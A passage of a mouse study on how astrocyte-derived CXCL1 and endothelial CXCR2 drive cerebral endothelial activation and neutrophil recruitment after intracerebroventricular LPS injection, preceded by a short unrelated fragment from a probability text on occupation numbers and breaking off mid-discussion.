entry increases the occupation number of the cell j from n to n + 1. Physicists speak of the "creation" of a particle in the cell j. We have determined the probability of this creation in such a way that, after a sequence of N creations, that is, the entry of N particles, the probability distribution on occupation vectors of the resulting system is (23). Because each creation in a cell j changes the system size from n to n + 1, whose occupation vectors are n and nj, the probability we have used in this section can be denoted by P(nj|n). This is the symbol we shall use in what follows.   Source < Prev   CONTENTS   Source   Next >
__label__pos
0.954288
Skip to main content CXCR2 is essential for cerebral endothelial activation and leukocyte recruitment during neuroinflammation Abstract Background Chemokines and chemokine receptors cooperate to promote immune cell recruitment to the central nervous system (CNS). In this study, we investigated the roles of CXCR2 and CXCL1 in leukocyte recruitment to the CNS using a murine model of neuroinflammation. Methods Wild-type (WT), CXCL1−/−, and CXCR2−/− mice each received an intracerebroventricular (i.c.v.) injection of lipopolysaccharide (LPS). Esterase staining and intravital microscopy were performed to examine neutrophil recruitment to the brain. To assess endothelial activation in these mice, the expression of adhesion molecules was measured via quantitative real-time polymerase chain reaction (PCR) and Western blotting. To identify the cellular source of functional CXCR2, chimeric mice were generated by transferring bone marrow cells between the WT and CXCR2−/− mice. Results Expression levels of the chemokines CXCL1, CXCL2, and CXCL5 were significantly increased in the brain following the i.c.v. injection of LPS. CXCR2 or CXCL1 deficiency blocked neutrophil infiltration and leukocyte recruitment in the cerebral microvessels. In the CXCR2−/− and CXCL1−/− mice, the cerebral endothelial expression of adhesion molecules such as P-selectin and VCAM-1 was dramatically reduced. Furthermore, the bone marrow transfer experiments demonstrated that CXCR2 expression on CNS-residing cells is essential for cerebral endothelial activation and leukocyte recruitment. Compared with microglia, cultured astrocytes secreted a much higher level of CXCL1 in vitro. Astrocyte culture conditioned medium significantly increased the expression of VCAM-1 and ICAM-1 in cerebral endothelial cells in a CXCR2-dependent manner. Additionally, CXCR2 messenger RNA (mRNA) expression in cerebral endothelial cells but not in microglia or astrocytes was increased following tumor necrosis factor-α (TNF-α) stimulation. The intravenous injection of the CXCR2 antagonist SB225002 significantly inhibited endothelial activation and leukocyte recruitment to cerebral microvessels. Conclusions CXCL1 secreted by astrocytes and endothelial CXCR2 play essential roles in cerebral endothelial activation and subsequent leukocyte recruitment during neuroinflammation. Background Immune cell recruitment is a key event in the development of many types of central nervous system (CNS) inflammatory diseases, such as bacterial meningitis [1], stroke [2], and multiple sclerosis [3]. Following the detection of pathogen-derived components or danger signals, leukocyte recruitment to the brain via chemotaxis [4, 5] occurs via a cascade-like process that involves the expression of endothelial cell- and leukocyte-expressed adhesion molecules such as selectins and integrins [68]. During the early stage of CNS inflammation, the interactions between chemokines and their receptors also exert a profound effect by attracting immune cells to migrate across the blood–brain barrier (BBB) [9, 10]. CXCR2 is a G protein-coupled receptor that is activated by CXC chemokines, including murine CXCL1, CXCL2, and CXCL5 [11, 12]. Interactions between CXCR2 and its ligands play an essential role in mediating neutrophil migration to sites of inflammation. Although extensive studies have focused on the role of CXCR2 in inflammatory responses in different organs, the involvement of individual chemokines in different types of inflammatory responses remains contentious. For example, CXCL1 is essential for the host pulmonary defense to klebsiella infection [13] and mediates neutrophil recruitment during the progression of experimental Lyme arthritis [14]. However, even in the presence of high levels of CXCL1 expression, the interaction between CXCL2 and CXCR2 is still essential for neutrophil migration in response to specific antigen challenge [15]. Additionally, CXCL2 plays a more important role than CXCL1 in a viral antigen-induced delayed-type hypersensitivity response [16]. Furthermore, CXCR2 is widely expressed on neutrophils [17], lymphocytes [18], and other types of non-hematopoietic cells, including epithelial [19] and endothelial cells [20, 21]. Most studies have focused on the functions of CXCR2 expressed on hematopoietic cells, such as monocytes [22, 23] and neutrophils [2427]. However, recent studies have revealed a critical role of CXCR2 expressed on non-hematopoietic cells during inflammatory responses. In a murine model of acute kidney infection, CXCR2 on non-bone marrow-derived cells influenced the neutrophil response [19]. Additionally, CXCR2 expression on resident cells is essential for the migration of mast cell progenitors in the lung of antigen-challenged mice [28]. However, the roles of CXCR2 and its ligands in CNS inflammation remain to be addressed. In this study, we performed intravital microscopy to examine the role of CXCR2 in leukocyte recruitment during neuroinflammation. We observed reduced neutrophil infiltration and attenuated leukocyte–endothelial cell interactions in CXCR2−/− and CXCL1−/− mice following the intracerebroventricular (i.c.v.) injection of lipopolysaccharide (LPS). Moreover, CXCR2 or CXCL1 deficiency impaired endothelial activation by attenuating the expression of adhesion molecules. Using chimeric mice expressing CXCR2 on either hematopoietic cells or radiation-resistant non-hematopoietic cells, we showed that CXCR2 expression on radiation-resistant cells in the CNS is essential for endothelial activation and subsequent leukocyte recruitment during neuroinflammatory responses. Furthermore, a high level of CXCL1 was detected in primary astrocyte culture and culture conditioned medium significantly increased the expression of VCAM-1 and ICAM-1 on cerebral endothelial cells. Taken together, our findings revealed a previously unrecognized role of CXCR2 expressed on cerebral endothelial cells in the regulation of endothelial activation and immune cell recruitment across the BBB during CNS inflammation. Methods Animals C57BL/6J mice (8 to 10 weeks old, 22 to 25 g) used as wild-type controls were purchased from the Model Animal Research Center of Nanjing University. CXCR2−/− mice (on the C57BL/6J background) were purchased from the Jackson Laboratory (Bar Harbor, ME, USA). All mice were maintained under environmentally controlled conditions (ambient temperature, 22 ± 2 °C; humidity 40 %) in a pathogen-free facility with a 12-h light/dark cycle and had access to water and food ad libitum. All experimental procedures were performed in strict accordance with the Institutional Animal Care and Use Committee of Nanjing Medical University. TALEN-mediated generation of CXCL1 knockout mice To target the CXCL1 gene in the mouse genome, we designed and synthesized highly active TALENs specific to the CXCL1 gene. The TALEN target sequence for CXCL1 was GATCCCAGCCACCCGC. TALEN messenger RNAs (mRNAs) were diluted in RNase-free phosphate-buffered saline (PBS) and then injected into the cytoplasm of mouse pronuclear stage embryos to produce mutant founders (F0). Heterozygous F1 offspring were interbred to produce homozygous F2 animals. To functionally validate the TALEN-induced mutations, we intracerebroventricularly injected LPS into these mice and measured the level of CXCL1 in the brain. No expression of CXCL1 was detected in the CXCL1 mutant founder. The CXCL1−/− mice were viable and fertile and did not exhibit any gross abnormalities. Intracerebroventricular injection of LPS Intracerebroventricular injections into the mice were performed as previously described [29]. Briefly, the mice were anesthetized via intraperitoneal (i.p.) injection with a mixture of 200 mg/kg ketamine and 10 mg/kg xylazine. Then, 2 μg of LPS (dissolved in sterile saline at a concentration of 1 μg/μl; Escherichia coli serotype 0111:B4 strain; Invivogen, Carlsbad, CA, USA) was injected into the left ventricles using a microsyringe over a 5-min period. Sham mice received isovolumetric sterile saline injection. After LPS injection, the mice were maintained under anesthesia at 36 ± 1 °C on a thermostatic heating system (Harvard Apparatus, MA, USA) for 4 h before intravital microscopy was performed. ELISA for chemokines The mice were anesthetized after LPS injection and subsequently perfused through the heart with 20 ml of cold PBS over a period of 5 min to remove protein from the blood circulation. Mouse brains were homogenized in 1 ml of cold PBS and centrifuged at 12,000 rpm for 5 min at 4 °C. The CXCL1, CXCL2, and CXCL5 concentrations in the supernatant were measured using commercial enzyme-linked immunosorbent assay (ELISA) kits (R&D systems, Minneapolis, MN, USA) according to the manufacturer’s instructions. The detection limit was 15.6 pg/ml for all assays. Flow cytometry Flow cytometric analysis of single-cell suspensions prepared from peripheral blood or spleens of wild-type or CXCL1−/− mice was performed on a Beckman CytoFlex (Beckman Coulter, Suzhou, China). Antibody clones used for staining were specific for Gr-1 (RB6-8C5, eBioscience, San Diego, USA), CD45 (30-F130, eBioscience), and CXCR2 (TG11, Biolegend, San Diego, CA, USA). Immunohistochemistry After anesthetization, the mice were transcardially perfused with ice-cold 4 % formalin. Then, the brains were removed and fixed in 4 % formalin for 48 h. The formalin-fixed tissues were embedded in paraffin and then sliced into 4μm sections. Infiltrating neutrophils were stained using a Naphthol AS-D Chloroacetate Specific Esterase Kit (Sigma, St. Louis, MO, USA). We selected more than four fields of view at a primary magnification of ×200 in the cortex or hippocampus of every brain section. Cells were counted under a Nikon E100 microscope, and the data are presented as the means ± SEM. Intravital microscopy of the mouse brain Intravital microscopy was performed as previously described [29]. Briefly, after anesthetization, the right parietal bone was subjected to craniotomy using a high-speed drill. Subsequently, the dura were removed from this site to expose the pial brain vessels. Rhodamine 6G (Sigma) was injected intravenously (0.5 mg/kg) into the mouse to label the leukocytes. Then, a microscope equipped with a fluorescent light source was used to detect the leukocytes. The data were collected through a sCMOS camera (ORCA-Flash 4.0, HAMAMATSU) mounted on the microscope and stored for subsequent analysis. Rolling leukocytes were defined as those cells moving at a slower velocity than the erythrocytes; adherent cells were defined as those that remained stationary for at least 30 s. RNA isolation and real-time quantitative PCR After perfusion through the heart, the brains were homogenized in 1 ml of TRIzol (Takara Bio, Inc., Shiga, Japan) on ice, and RNA was extracted using TRIzol reagent according to the protocol supplied by the manufacturer. A total of 1 μg of total RNA was reverse-transcribed into cDNA. Then, SYBR® Green-based quantitative real-time polymerase chain reaction (PCR) was performed with a Bio-rad CFX 96 Touch (Bio-Rad Laboratories, Hercules, CA, USA) according to the manufacturer’s instructions. β2-Macroglobulin (β2-MG) was used as a housekeeping gene because its expression was not influenced by the treatments. The amplification conditions were as follows: 95 °C (2 min) followed by 32 cycles of 95 °C (20 s), 57.2 °C (30 s), and 72 °C (30 s). Quantitative PCR assays were conducted in triplicate for each sample and were performed using the 2−ΔΔCt method. The amplified products were verified on a 1.5 % agarose gel by electrophoresis. The data are expressed as the n-fold differences relative to the standard. Western blotting After i.c.v. LPS injection, the mice were anesthetized and perfused with ice-cold PBS to clear blood-borne proteins. Next, the brain was homogenized in 1 ml of cold PBS on ice, and the homogenate was centrifuged (12,000 rpm, 5 min). Cells were digested with radioimmunoprecipitation assay (RIPA) lysis buffer (50 mmol/L Tris–HCl, 150 mmol/L NaCl, 1 % Nonidet-40, 0.5 % sodium deoxycholate, 1 mmol/L EDTA, 1 mmol/L PMSF) for 30 min on ice and centrifuged at 12,000 rpm for 15 min at 4 °C. The brain homogenates or cell lysate were diluted in PBS and loading buffer, boiled (100 °C, 10 min), loaded on a 10 % acrylamide–SDS gel, and transferred to a Protran nitrocellulose membrane (Millipore, Billerica, MA, USA). The membranes were blocked with 5 % dry milk in PBS for 2 h at room temperature, incubated in primary antibodies against P-selectin (ab178424, Abcam, Cambridge, USA), E-selectin (ab18981, Abcam),VCAM-1 (ab134047, Abcam), ICAM-1 (ab25375, Abcam), CXCR2 (ab14935, Abcam), albumin (ab19194, Abcam), and β-actin (Cell Signaling, Beverly, CA, USA) overnight at 4 °C, washed, incubated in species-appropriate HRP-conjugated secondary antibodies for 1–2 h at room temperature in the dark, and washed three times. Then, the membranes were subjected to immunodetection using enhanced chemiluminescence reagents (PerkinElmer, Waltham, MA, USA). Determination of albumin concentrations in brain parenchyma The mice were anesthetized and perfused with 20 ml of cold PBS over a period of 10 min to remove proteins from the blood circulation. Then, the concentration of albumin, a serum protein that is normally excluded from the brain by the intact blood–brain barrier, was measured in brain homogenates by Western blotting as previously described [30]. Primary culture of purified microglia and astrocytes After the neonatal cerebra were harvested, cerebral cortices devoid of cerebella, white matter, and leptomeninges were trypsinized for 5 min and then filtered through a 70-μm pore size filter. The cells from seven cerebra were seeded on an uncoated 75-cm2 culture flask and incubated in 40 ml of Dulbecco’s modified essential media (DMEM)/F12 containing 10 % FBS. The medium was replenished every 3–4 days after cell seeding. On days 13–14, microglia were isolated by shaking the flask at 250 rpm for 1 h as described [31]. Then, the cells were centrifuged and seeded at the appropriate density in six-well plates for further stimulation. After the mixed glial cells were passaged two to three times and shaken at 250 rpm for 6 h, the supernatants were discarded; the remaining adherent cells that remained consisted predominantly of astrocytes [32]. Isolation and culture of primary mouse brain microvascular endothelial cells Primary cerebral endothelial cells were prepared as previously described [33]. In brief, cortices from 7- to 8-week-old C57BL/6J mice were isolated by removing the cerebellum, striatum, optic nerves, and white matter. The outer vessels and the meninges were removed using dry cotton swabs. Then, the tissue sample was fragmented into 2-mm2-thick pieces and digested in 15 ml of 0.1 % collagen B (Roche, Indianapolis, IN, USA) supplemented with 30 U/ml DNase I (Sigma, St. Louis, MO, USA) for 1.5–2 h at 37 °C with occasional agitation. The suspension was centrifuged at 1000 rpm for 8 min. The resulting homogenate was mixed with 20 % BSA in DMEM and centrifuged at 4000 rpm for 20 min at 4 °C. The neural component and the BSA layer were discarded, and the pellet containing the vascular component was further digested in 0.1 % collagenase/dispase (Roche, Indianapolis, IN, USA) supplemented with 20 U/ml DNase I for 1.5–2 h at 37 °C. The final microvessel pellets were resuspended in DMEM supplemented with 30 % FBS (Life Technologies, Carlsbad, CA, USA), 3 ng/ml bFGF (Peprotech, Rocky Hill, NJ, USA), 10 U/ml heparin, 100 U/ml penicillin, and 100 mg/ml streptomycin. The medium was refreshed every 2 days. The endothelial cells grew to confluency after 7 days. The purity of the endothelial cells was >93 %. Generation of chimeric mice Prior to irradiation, the mice were treated with antibiotics with the intention of eliminating Pseudomonas aeruginosa from the gastrointestinal tract. Neomycin was added to the drinking water 2 weeks post-irradiation. The recipient mice were lethally irradiated with two doses of 500 rad (separated by 2–3 h) as previously described [34]. Bone marrow cells were harvested from both the femora and tibiae of the donor mice, and approximately 5–6 million cells were intravenously injected into the recipient mice. Bone marrow transfers were performed as follows: (1) bone marrow cells from the CXCR2−/− mice were transferred into the wild-type (WT) mice (chimeric, expressing CXCR2 on only the non-hematopoietic cells) and (2) bone marrow cells from the WT mice were transferred into the CXCR2−/− mice (chimeric, expressing CXCR2 on only the hematopoietic cells). All chimeric mice were used for intravital microscopy experiments 6–8 weeks after bone marrow transfer. CXCR2 blockade To block endothelial CXCR2, WT mice were intravenously injected with CXCR2 antagonist SB225002 (Cayman, Ann Arbor, MI, USA) at a dose of 1 mg/kg 0.5 h prior to i.c.v. LPS injection [35]. The mice in the control group were intravenously injected with 1 % DMSO 0.5 h prior to i.c.v. LPS injection. SB225002 was dissolved in DMSO and diluted with 0.9 % saline, achieving a final concentration of 1 % DMSO. Statistical analysis The data were analyzed using SPSS software (17.0 for Windows, IBM Inc., Chicago, IL, USA). Data shown represent the means ± standard error of the mean (SEM). Statistical significance was determined using Student’s t tests for comparisons between two groups or by one-way ANOVA with Bonferroni correction for multiple groups of treatments. The differences were considered to be significant when P < 0.05. Results Generation of TALEN-mediated CXCL1 knockout mice To target the CXCL1 gene in the mouse genome, TALEN constructs that targeted the DNA sequence of the murine CXCL1 gene were created as illustrated in Fig. 1A. The founders (#1, #2, and #3) from the newborns were verified by T7 endonuclease I (Fig. 1B). All TALEN-induced mutations were deletions of variable lengths that induced frameshifts in the CXCL1 gene. Bi-allelic mutations were observed in three mutant mice (Fig. 1C). CXCL1−/− mice were healthy, fertile, displayed no overt phenotype, and had normal leukocyte and neutrophil counts in the peripheral blood and spleen (Fig. 1D). Flow cytometry also revealed that neutrophils from CXCL1−/− mice expressed CXCR2 at a similar level to wild-type mice (Fig. 1E). In addition, CXCL1−/− mice showed normal TLR4 and CXCR2 mRNA expression levels in the brain (Fig. 1F). In response to systemic or i.c.v. LPS treatment, IL-6 and tumor necrosis factor-α (TNF-α) in the brain and plasma were increased to a similar extent in both CXCL1−/− and wild-type mice (Fig. 1G). Fig. 1 figure 1 Generation of TALEN-mediated CXCL1 knockout mice. A DNA-binding sequences are presented in red or green, and the spacer region for CXCL1-TALEN where a double-strand break will occur is underlined. B T7 endonuclease I (T7EI) assays were conducted using genomic DNA from the founder mice. The arrow shows the size (300 bp) of T7EI-digested DNA fragments. #1, #2, and #3 are the mutant founder (F0) mice generated by injection with CXCL1-TALEN mRNA. C DNA sequences of the CXCL1 locus from live founder mice identified by T7E1 assays in B. “-” shows the deleted nucleotides. D Peripheral blood mononuclear cells and splenocytes were collected from wild-type or CXCL1−/− mice. Numbers of CD45+ and Gr.1+ cells were quantified via flow cytometry. E Peripheral blood mononuclear cells were collected from wild-type or CXCL1−/− mice, CXCR2 expression in neutrophils from WT and CXCR2−/− mice were analyzed via flow cytometry. F mRNA expression levels of TLR4 and CXCR2 in the brain of WT or CXCL1−/− mice were analyzed by RT-PCR. G Wild-type and CXCL1−/− mice were treated with i.p. or i.c.v. LPS injection. Four hours later, levels of TNF-α and IL-6 in the brain tissue or plasma were determined by ELISA. Data are expressed as the mean ± SEM, n = 4 mice in all of the groups Intracerebroventricular injection of LPS induces neutrophil recruitment and CXCL chemokine (CXCL1, CXCL2, and CXCL5) expression Intracerebroventricular injection of LPS strongly induced the expression of inflammatory cytokines and chemokines in the CNS. As shown in Fig. 2A–C, LPS injection significantly induced the expression of CXCL chemokines, including CXCL1, CXCL2, and CXCL5. The levels of both CXCL1 (Fig. 2A) and CXCL2 (Fig. 2B) gradually increased and peaked 8 h after LPS injection, then gradually decreased thereafter. The level of CXCL5 (Fig. 2C) peaked at 16 h. Among all of these CXCL chemokines, CXCL1 exhibited the highest expression level following LPS injection. The peak concentration of CXCL5 was 10-fold less than that of CXCL1. At 12 h after i.c.v. LPS injection, neutrophils began to migrate into the brain. Infiltrating neutrophils, as detected by esterase-specific staining, were observed 12 h post-treatment in the cortex (Fig. 2D); this infiltration peaked at 24 h in the cortex (Fig. 2D) and the hippocampus (Fig. 2E) and decreased thereafter. Fig. 2 figure 2 Chemokine levels and the effect of CXCR2 or CXCL1 deficiency on neutrophil recruitment to the brain parenchyma after i.c.v. LPS injection. Wild-type mice were i.c.v. injected with LPS. CXCL1 (A), CXCL2 (B), and CXCL5 (C) concentrations in the brains of WT (C57BL/6J) mice were determined via ELISA at various time points after i.c.v. LPS injection. WT mice i.c.v. injected with saline for 24 h served as negative controls. Infiltrating neutrophils in the cortex (D) and hippocampus (E) were quantified via esterase staining of the brain sections 4, 12, 24, or 48 h after i.c.v. LPS or saline injection. (F) The WT, CXCR2−/−, and CXCL1 mice were i.c.v. injected with LPS 24 h before the quantification of infiltrating neutrophils. Representative photomicrographs of brain sections stained for esterase positive neutrophils (arrows) from wild-type, (G–I) CXCR2−/− and CXCL1 mice. Scale bar: 100 μm; 10 μm (inset). CXCR2 and CXCL1 deficiency significantly reduced neutrophil recruitment in the cortex (G), hippocampus (H), and choroid plexus (I). The results are presented as the means ± SEM and represent a minimum of five mice per group. *P < 0.05; **P < 0.01 Deficiency in CXCR2 or CXCL1 affects neutrophil infiltration induced by the i.c.v. injection of LPS To investigate the role of CXCR2 in neutrophil recruitment to the brain, we compared neutrophil infiltration in the WT and CXCR2−/− mice after i.c.v. LPS injection (Fig. 2F). CXCR2−/− mice displayed significantly reduced neutrophil infiltration into the cerebral cortical (Fig. 2G), hippocampal regions (Fig. 2H) and choroid plexus (Fig. 2I). As CXCL1 was most highly expressed during LPS-induced CNS inflammation, we generated CXCL1-deficient mice using the TALEN knockout technique and compared neutrophil infiltration in these mice with that in the WT mice. Interestingly, the CXCL1−/− mice also exhibited a complete lack of neutrophil recruitment to the cortex, the hippocampus, and choroid plexus (Fig. 2G–I). Therefore, both CXCL1 and CXCR2 play essential roles in LPS-induced neutrophil recruitment into the brain. Deficiency in CXCR2 or CXCL1 affects leukocyte recruitment in brain vessels Chemokines regulate immune cell trafficking by assisting the activation, adhesion, crawling, and transmigration of leukocytes across the cerebral endothelial barrier. To verify the role of CXCR2 in the neutrophil recruitment cascade in brain microvessels, we performed intravital microscopy to examine leukocyte recruitment in brain vessels during LPS-induced CNS inflammation. As expected, i.c.v. LPS injection caused significant rolling and adhesion of leukocytes in post-capillary venules in brains of WT mice (Fig. 3A). Interestingly, leukocyte–endothelial cell interactions appeared to be reduced in the CXCR2−/− (Fig. 3B) and CXCL1−/− mice (Fig. 3C). Rolling (Fig. 3D) and adherent cells (Fig. 3e) were almost completely absent in the CXCR2−/−and CXCL1−/− mice, indicating that both CXCL1 and CXCR2 are essential for the leukocyte recruitment cascade in cerebral microvessels in the LPS-induced neuroinflammation. Fig. 3 figure 3 CXCR2 deficiency causes decreased leukocyte rolling and adhesion in brain vessels after i.c.v. LPS injection. Intravital microscopy was performed on wild-type (A), CXCR2−/− (B), and CXCL1−/− mice (C) 4 h after LPS i.c.v. injection. The results of rolling flux (D) and leukocyte adhesion (E) are presented as the means ± SEM. n = 4–6 mice per group. **P < 0.01 CXCR2 deficiency decreases brain endothelial activation in vivo To investigate the molecular mechanisms underlying the effects of CXCR2 and CXCL1 deficiency on leukocyte–endothelial cell interactions, the expression of adhesion molecules in CXCR2−/− and CXCL1−/− mice was assessed via real-time PCR 4 h after i.c.v. LPS injection. Interestingly, the mRNA expression levels of P-selectin (Fig. 4A), E-selectin (Fig. 4B), VCAM-1 (Fig. 4C), and ICAM-1 (Fig. 4D) were significantly reduced in CXCR2−/− and CXCL1−/− mice. Additionally, the protein expression levels of these adhesion molecules were assessed by Western blotting (Fig. 5A). Consistent with the real-time PCR results, both CXCR2 deficiency and CXCL1 deficiency dramatically reduced the protein expression of P-selectin (Fig. 5B) and VCAM-1 (Fig. 5C) in the brain. A significant reduction in the levels of ICAM-1 (Fig. 5D) was also observed in the CXCR2−/− mice, albeit to a lesser extent. Taken together, these results suggest that both CXCR2 and CXCL1 are critical effectors that mediate the expression of adhesion molecules on cerebral endothelial cells during CNS inflammation. Fig. 4 figure 4 The effect of CXCR2 or CXCL1 deficiency on the mRNA expression of adhesion molecules in vivo. The mRNA expression of P-selectin, E-selectin, VCAM-1, and ICAM-1 saline-treated (4 h after i.c.v. saline injection) control group of WT mice and LPS-treated (4 h after i.c.v. LPS injection) WT, CXCR2−/−, and CXCL1−/− mice was quantified via real-time PCR. Both CXCR2 and CXCL1 deficiency resulted in the down-regulation of P-selectin (A), E-selectin (B), VCAM-1 (C), and ICAM-1 (D) mRNA expression in the brain. n = 6–8 mice for all groups. *P < 0.05; **P < 0.01 Fig. 5 figure 5 Effects of CXCR2 or CXCL1 deficiency on the expression of P-selectin, E-selectin, and adhesion molecules in vivo and on BBB permeability. a The protein expression of P-selectin, E-selectin, VCAM-1, and ICAM-1 (4 h after i.c.v. saline injection) in the saline-treated control group of WT mice and LPS-treated (4 h after i.c.v. LPS injection) WT, CXCR2−/−, and CXCL1−/− mice was determined via Western blot analysis. Effects of CXCR2 or CXCL1 deficiency on P-selectin (b), VCAM-1 (c), and ICAM-1 (d) expression in the brain. e Western blotting analysis of the albumin levels in the brains of WT and CXCR2−/− mice 4, 12, and 24 h after the intraventricular injection of LPS was performed. Optical densities were determined using a computer imaging analysis system. n = 5 mice per group. **P < 0.01; ***P < 0.001 It is well established that CNS inflammation induces permeability changes to the blood–brain barrier. The i.c.v. injection of LPS induced a significant change in brain albumin concentration 12 and 24 h post-treatment in both WT and CXCR2−/− mice. However, no significant difference in albumin concentrations between the WT and CXCR2−/− mice was observed 4, 12, and 24 h after i.c.v. LPS injection (Fig. 5E). Therefore, it is likely that rather than affecting the integrity of blood–brain barrier, CXCR2 deficiency affected neutrophil recruitment by attenuating endothelial activation. CXCR2 expression on CNS-residing cells mediates endothelial activation and leukocyte recruitment in chimeric mice To identify the source of functional CXCR2 that mediates leukocyte recruitment, we generated chimeric mice by transferring bone marrow cells between WT and CXCR2−/− mice (Fig. 6A). Intravital microscopy was performed on all chimeric mice 4 h after i.c.v. LPS injection. CXCR2−/− mice that were reconstituted using WT bone marrow cells exhibited reduced leukocyte rolling and adhesion. By contrast, the chimeric mice generated by reconstituting the WT mice using CXCR2−/− bone marrow cells exhibited normal leukocyte recruitment to the cerebral microvessels (Fig. 6B). Consistent with our observations from intravital microscopy, the CXCR2−/− mice reconstituted with WT bone marrow cells displayed significantly reduced levels of P-selectin and VCAM-1 expression, whereas the levels of P-selectin and VCAM-1 expression in the WT mice reconstituted using CXCR2−/− bone marrow cells were almost similar to that of WT mice (Fig. 6C). Fig. 6 figure 6 Leukocyte recruitment and the expression of P-selectin and VCAM-1 in the WT, CXCR2−/−, and chimeric mice. a Chimeric mice were generated by transferring bone marrow cells between WT and CXCR2−/− mice. b Intravital microscopy was performed on WT, CXCR2−/−, and chimeric mice, 4 h after i.c.v. LPS injection. The number of rolling and adherent leukocytes is presented as the mean ± SEM. c The expression of P-selectin and VCAM-1 in the WT, CXCR2−/−, and chimeric mice was compared by Western blotting, n = 4 mice per group. Data are presented as the means ± SEM, *P < 0.05; **P < 0.01 Astrocyte-derived CXCL1 and endothelial CXCR2 are important in cerebral endothelial activation The reductions in endothelial activation and subsequent leukocyte–endothelial cell interactions in CNS microvessels resulted from a lack of CXCR2 expression on CNS-residing cells, but not on circulating neutrophils. Therefore, the functional CXCR2 that mediates endothelial activation is likely localized to radiation-resistant non-hematopoietic cells, such as endothelial or glial cells. LPS i.c.v. injection induced significant levels of CXCR2 mRNA (Fig. 7A) and protein (Fig. 7B). Upon TNF-α stimulation, primary endothelial cells, compared with glial cells, exhibited much higher expression of CXCR2 mRNA. No significant change in CXCR2 transcription was noted in primary microglia or astrocytes (Fig. 7C). Following stimulation with TNF-α or LPS, the cerebral endothelial cells, compared with astrocytes and microglia, also expressed much higher level of CXCR2 protein (Fig. 7D). Astrocytes secreted much higher levels of CXCL1 than microglia in response to TNF-α and LPS (Fig. 7E). Astrocyte culture conditioned medium stimulated strong expression of VCAM-1 and ICAM-1 in WT cerebral endothelial cells. Reduced expression of these molecules was observed in CXCR2−/− endothelial cells (Fig. 7F). These results suggest that astrocyte-derived CXCL1 and endothelial CXCR2 do play critical roles in cerebral endothelial activation. Fig. 7 figure 7 Astrocyte-derived CXCL1 and endothelial CXCR2 are essential for cerebral endothelial activation. A i.c.v. LPS injection (4 h) induced significant CXCR2 mRNA expression in WT mice. B Levels of CXCR2 protein after i.c.v. LPS injection from 4 to 24 h gradually increased compared with the control group (4 h after i.c.v. saline injection). C The expression of CXCR2 mRNA in primary brain microvascular endothelial cells, microglia, and astrocytes stimulated with either vehicle or TNF-α (100 ng/ml) was measured via real-time PCR. The results are represented as the means ± SEM of three independent experiments; *P < 0.05. D Primary endothelial cells, astrocytes, and microglia were seeded at 2 × 106 cells/well in six-well plates and were incubated overnight. The following day, the cells were stimulated with 100 ng/ml LPS or 100 ng/ml TNF-α for 12 h. Cell lysates were collected and analyzed for CXCR2 expression via Western blotting. E Primary astrocytes and microglia from wild-type mice were seeded at 2 × 106 cells/well in six-well plates and were incubated overnight. The following day, the cells were stimulated with 100 ng/ml LPS or 100 ng/ml TNF-α for 12 h. Then, the conditioned supernatants and cell lysates were collected and analyzed for CXCL1 expression via ELISA. The results are represented as the means ± SEM of three independent experiments; **P < 0.01. F Astrocyte culture conditioned medium was added into primary cerebral endothelial cells from wild-type or CXCR2−/− mice, and the levels of VCAM-1 and ICAM-1 were measured via Western blotting Effect of CXCR2 blockade on leukocyte recruitment and endothelial activation To validate the critical role of endothelial CXCR2 in cerebral endothelial activation, we intravenously infused the CXCR2 antagonist SB225002 at a dose of 1 mg/kg 0.5 h prior to i.c.v. LPS injection to block CXCR2 signaling [35] from the luminal surface of the cerebral microvessels. As detected by Western blotting, SB225002 treatment decreased the levels of VCAM-1 and E-selectin expression but not that of P-selectin (Fig. 8A). In addition, intravital microscopy also revealed that the injection of SB225002 significantly decreased leukocyte rolling and adhesion in brain microvessels (Fig. 8B). These results further indicate that endothelial CXCR2 plays a critical role in endothelial activation and subsequent leukocyte recruitment. Fig. 8 figure 8 The effect of CXCR2 antagonist infusion on leukocyte rolling and adhesion in CNS vessels. WT mice received an intravenous injection of the CXCR2 antagonist SB225002 (1 mg/kg) 0.5 h prior to i.c.v. LPS injection. Four hours after i.c.v. LPS injection, the protein expression of P-selectin, VCAM-1, and E-selectin in the brain was determined by Western blot analysis (A). Intravital microscopy was performed on the mice. The results of leukocyte recruitment (B) are presented as the mean ± SEM. n = 4 mice for all groups. *P < 0.05; **P < 0.01 Discussion Leukocyte recruitment is a hallmark of various CNS inflammatory diseases. The chemokine receptor CXCR2 and its ligands CXCL1, CXCL2, and CXCL5 play crucial roles in the trafficking of neutrophils. In the current study, we showed that LPS injection into the brain significantly induced the production of CXCL1, CXCL2, and CXCL5. CXCL1, the most potent neutrophil-chemoattracting CXCR2 ligand, was upregulated in the CNS at the earliest time point and was correspondingly expressed at the highest level. The i.c.v. injection of LPS has been widely applied as an animal model for the study of brain inflammation. The dosage of 2 μg of LPS is considerably above what is observed in most infections and results in robust neutrophil recruitment. However, a significant reduction in the number of infiltrating neutrophils was observed in the brain parenchyma of CXCR2−/− and CXCL1−/− mice after i.c.v. LPS injection. Therefore, CXCL1 acts as the principal mediator of neutrophil recruitment during LPS-induced CNS inflammation. The leukocyte recruitment cascade in brain vessels is directed by the complex interactions between adhesion molecules and their receptors [36, 37]. Intravital microscopy revealed that a deficiency in either CXCR2 or CXCL1 significantly reduced leukocyte–endothelial cell interactions in brain vessels. Additionally, reduced expression of P-selectin, VCAM-1, and ICAM-1 was observed in the brain of CXCR2−/− mice. Therefore, it is likely that the functional CXCR2 that mediates leukocyte recruitment is located on the CNS endothelium. Our previous study reported that TNF-α in the LPS-treated brain activated the endothelium to cause an increase in adhesion molecule expression and leukocyte recruitment [29]. In response to i.c.v. LPS injection, CXCR2 deficiency did not reduce TNF-α levels in the brain. Clearly, a deficiency in CXCR2 or CXCL1 directly affected cerebral endothelial activation, but not microglial activation. In addition to its chemotactic properties, CXCL1 also exerts direct effects on BBB permeability. The exposure of brain microvascular endothelial cells to CXCL1 in vitro altered endothelial permeability and facilitated transendothelial monocyte migration [38]. However, in our study, CXCR2 deficiency did not affect albumin leakage across the BBB. Therefore, the reduction in neutrophil infiltration was not due to a change in the integrity of BBB but to a lack of cerebral endothelial activation resulting from CXCL1 or CXCR2 deficiency. Among the chimeric mice generated by transferring bone marrow precursors between CXCR2−/− and WT mice, WT mice reconstituted using CXCR2−/− bone marrow cells exhibited normal cell recruitment to the brain vessels. Interestingly, functional CXCR2 is not expressed on circulating leukocytes from the bone marrow. Therefore, the activation of CXCR2 on leukocytes is not required for their recruitment in cerebral blood vessels. Earlier studies have identified the expression of CXCR2 on many types of CNS-residing cells [3941]. This finding demonstrated that the expression of CXCR2 on CNS-residing cells, including 